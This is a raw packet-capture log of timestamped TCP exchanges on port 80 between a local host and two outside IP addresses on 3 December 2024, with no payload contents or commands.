                                                                                                  Dec 3, 2024 09:52:33.370950937 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.370999098 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371046066 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371088982 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371130943 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371143103 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.371172905 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371212006 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.371218920 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371263027 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371293068 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.371305943 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371349096 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371408939 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371433973 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371476889 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371503115 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.371517897 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371562004 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.371606112 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.371695995 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.373512030 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.373569965 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.373615026 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.373657942 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.373745918 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.373831034 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.709748983 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.709806919 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.709852934 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.709896088 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.709939003 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.709985018 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710028887 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710069895 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710112095 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710154057 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710163116 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.710196972 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710239887 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710251093 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.710283041 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710297108 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.710325003 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710370064 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710407019 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.710412025 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710445881 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.710508108 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.710705996 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:34.205216885 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:35.221992970 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:35.571281910 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.571598053 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:35.576987028 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:35.926237106 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.927978039 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.927999973 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.928096056 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.928112984 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.928128004 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.928143978 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.928158045 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.928247929 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.928267956 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.928282976 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:35.928311110 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:35.928479910 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:35.928481102 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:35.928554058 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.277518988 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.277643919 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.277667046 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.277687073 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.277704954 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.277723074 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.277906895 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.277930975 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278095961 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.278095961 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.278107882 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278111935 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278112888 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278114080 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278249979 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278424025 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.278424025 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.278446913 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278449059 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278449059 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278450012 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278450966 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278451920 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278593063 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.278613091 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.278759003 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.278928995 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.627505064 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.627563953 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.627612114 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.627655983 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.627700090 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.627742052 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.627785921 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.627830982 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.627857924 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.627857924 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.627876043 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.627922058 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.627965927 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.628007889 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.628030062 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.628051996 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.628096104 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.628139973 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.628184080 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.628213882 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.628221035 CET8049946129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:36.628339052 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.628534079 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:36.628534079 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:37.079545021 CET4994680192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:38.096045017 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:38.450100899 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.450357914 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:38.455188990 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:38.809175014 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.809210062 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.811518908 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.811567068 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.811604023 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.811640978 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.811680079 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.811717987 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.811745882 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.811763048 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:38.811780930 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.811810970 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:38.811817884 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.811971903 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:38.813234091 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:38.813560963 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.165450096 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165556908 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165570021 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165580988 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165596962 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165606976 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165729046 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165731907 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.165741920 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165752888 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165761948 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165772915 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165781021 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.165782928 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165792942 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165802002 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165857077 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165868044 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.165880919 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.165977955 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.166146994 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.167165041 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.167270899 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.167282104 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.167292118 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.167557001 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.519779921 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.519793987 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.519889116 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520019054 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520031929 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520035028 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.520041943 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520068884 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520080090 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520088911 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520100117 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520170927 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.520185947 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520199060 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520209074 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520219088 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520229101 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520239115 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520246983 CET8049947129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:39.520265102 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.520314932 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.520410061 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:39.969461918 CET4994780192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:40.986407042 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:41.326831102 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.327107906 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:41.331007957 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:41.671561956 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.673449993 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.673532963 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.673580885 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.673624039 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.673667908 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.673710108 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.673747063 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.673789024 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.673824072 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:41.673825026 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:41.673832893 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.674160957 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:41.674160957 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:41.674726009 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:41.674890995 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.014682055 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.014736891 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.014774084 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.014810085 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.014847994 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.014883995 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.014918089 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.014952898 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.014988899 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015017033 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.015017033 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.015026093 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015063047 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015098095 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015132904 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015170097 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015188932 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.015188932 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.015204906 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015243053 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015351057 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.015381098 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015419960 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015528917 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.015583038 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015625000 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.015700102 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.015700102 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.015861034 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.355838060 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.355851889 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.355931997 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.355988979 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.356055975 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356070042 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356080055 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356090069 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356100082 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356110096 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356220961 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356234074 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356244087 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356254101 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356323957 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.356323957 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.356336117 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356338024 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356338978 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356338978 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:42.356497049 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.356497049 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.356666088 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.356666088 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.357616901 CET4994880192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:42.697935104 CET8049948129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:47.375243902 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:47.477715015 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:47.477904081 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:47.482974052 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:47.585501909 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.131975889 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.131987095 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.132180929 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.654954910 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655061007 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655072927 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655083895 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655102015 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655209064 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.655227900 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655241013 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655251026 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655261040 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655270100 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655332088 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655333996 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655340910 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.655391932 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.655448914 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.655556917 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.655776024 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655788898 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655878067 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655888081 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655898094 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.655951023 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.656090021 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.656145096 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.656204939 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.656658888 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.656757116 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.656769991 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.656855106 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.656867981 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.656877995 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.656974077 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.657033920 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.657458067 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.657605886 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.657625914 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.657635927 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.657645941 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.657722950 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.657753944 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.657932997 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.658416033 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.658447981 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.658540010 CET8049949104.21.7.187192.168.11.30
